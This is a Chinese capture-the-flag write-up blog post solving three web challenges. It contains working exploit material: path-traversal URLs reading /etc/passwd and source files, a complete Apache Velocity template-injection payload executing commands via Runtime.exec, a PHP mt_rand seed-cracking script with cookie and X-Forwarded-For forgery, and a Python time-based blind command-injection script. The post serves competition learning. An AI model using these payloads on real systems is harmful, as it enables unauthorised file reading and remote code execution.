本文最后更新于 184 天前,其中的信息可能已经有所发展或是发生改变。
Author:颖奇L’Amore
Blog:www.gem-love.com
zblog
在title找到了任意文件读取
view-source:http://122.112.253.135/?title=../../../../../../../etc/passwd
view-source:http://122.112.253.135/?title=../../../../../../../home/ctf/web/.idea/workspace.xml
<component name="IdeDocumentHistory">
<option name="CHANGED_PATHS">
<list>
<option value="$PROJECT_DIR$/src/main/resources/hello.vm" />
<option value="$PROJECT_DIR$/src/main/resources/aaa" />
<option value="$PROJECT_DIR$/pom.xml" />
<option value="$PROJECT_DIR$/src/main/resources/index" />
<option value="$PROJECT_DIR$/src/main/resources/templates/My First Blog" />
<option value="$PROJECT_DIR$/src/main/resources/templates/hello" />
<option value="$PROJECT_DIR$/src/main/resources/templates/index" />
<option value="$PROJECT_DIR$/src/main/java/Blog.java" />
</list>
</option>
</component>
得到源码:
view-source:http://122.112.253.135/?title=../../../../../../../home/ctf/web/src/main/java/Blog.java
import static spark.Spark.*;
import java.io.*;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import spark.template.velocity.VelocityTemplateEngine;
import java.io.StringWriter;
public class Blog {
private static void log(String fname, String content) {
try {
FileWriter writer = new FileWriter(fname, true);
writer.write(content);
writer.close();
} catch (IOException e) {
}
}
public static void main(String[] arg) {
staticFiles.location("/public");
VelocityEngine velocityEngine = new VelocityEngine();
velocityEngine.setProperty(VelocityEngine.RESOURCE_LOADER, "file");
velocityEngine.setProperty(VelocityEngine.FILE_RESOURCE_LOADER_PATH, "/");
velocityEngine.init();
VelocityContext context = new VelocityContext();
get("/", (request, response) -> {
request.session(true);
String title = request.queryParams("title");
if (title != null) {
log("/tmp/" + request.session().id(), "Client IP: " + request.ip() + " -> File: " + title + "\n");
Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/" + title);
StringWriter sw = new StringWriter();
template.merge(context, sw);
return sw;
}
Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/index");
StringWriter sw = new StringWriter();
template.merge(context, sw);
return sw;
});
}
}
velocity模板注入RCE,payload(别忘了url编码):
#set($s="")#set($stringClass=$s.getClass())#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))#set($readerClass=$stringClass.forName("java.io.Reader"))#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))#set($systemClass=$stringClass.forName("java.lang.System"))#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())#set($process=$runtime.exec("whoami"))#set($null=$process.waitFor() )#set($inputStream=$process.getInputStream())#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))#set($stringBuilder=$stringBuilderConstructor.newInstance())#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))$output
然后再去读一下log文件看命令执行结果
easyseed
index.bak:
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
cookie处得到lock
为EUHaY
,由header可知PHP的版本X-Powered-By: PHP/5.6.28
PHP伪随机数问题,和GWCTF枯燥的抽奖差不多,老考点了,exp:
<?php
//Y1ng
function getSeed()
{
$chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';
$max = strlen($chars) - 1;
$hash_result = 'vEUHaY';
$arr = [];
$index = 0;
for ($i=0; $i< strlen($hash_result); $i++)
{
for ($j=0; $j< strlen($chars); $j++)
{
if ( $hash_result[$i] === $chars[$j] )
{
$arr[$index] = $j;
$index++;
break;
}
}
}
echo "./php_mt_seed ";
for ($i = 0; $i<count($arr); $i++)
{
echo "${arr[$i]} ${arr[$i]} 0 ${max} ";
}
echo "\n";
}
function getKey()
{
function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
mt_srand(718225);
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
echo $lock . ' ' . $key;
}
getSeed(); //./php_mt_seed 21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51
getKey(); // vEUHaY nRtqGR8mtd9ZOPyI
爆破出种子718225
,之后计算$key
为nRtqGR8mtd9ZOPyI
,放到cookie里,还需要XFF头伪造个127.0.0.1,即可得到flag。
easyweb
在header处写到post cmd
,于是POST提交一个cmd
可以执行命令,但是不出网,于是bash时间盲注。
可以直接利用第三届BJDCTF帮帮小红花一题的exp,除了把GET提交改成POST提交,其他一点没变,exp:
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
import time as t
from urllib.parse import quote as urlen
url = 'http://119.3.37.185/'
alphabet = ['{','}', '.', '@', '_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
result = ''
for i in range(1,50):
for char in alphabet:
payload = "if [ `ls / | grep 'flag' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) #/flag.txt
payload = "if [ `cat /flag.txt |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
data = {'cmd':payload}
try:
start = int(t.time())
r = requests.post(url, data=data)
end = int(t.time()) - start
if end >= 3:
result += char
print("Flag: "+result)
break
except Exception as e:
print(e)
颖奇L'Amore原创文章,转载请注明作者和文章链接
本文链接地址:https://www.gem-love.com/ctf/2612.html
注:本站定期更新图片链接,转载后务必将图片本地化,否则图片会无法显示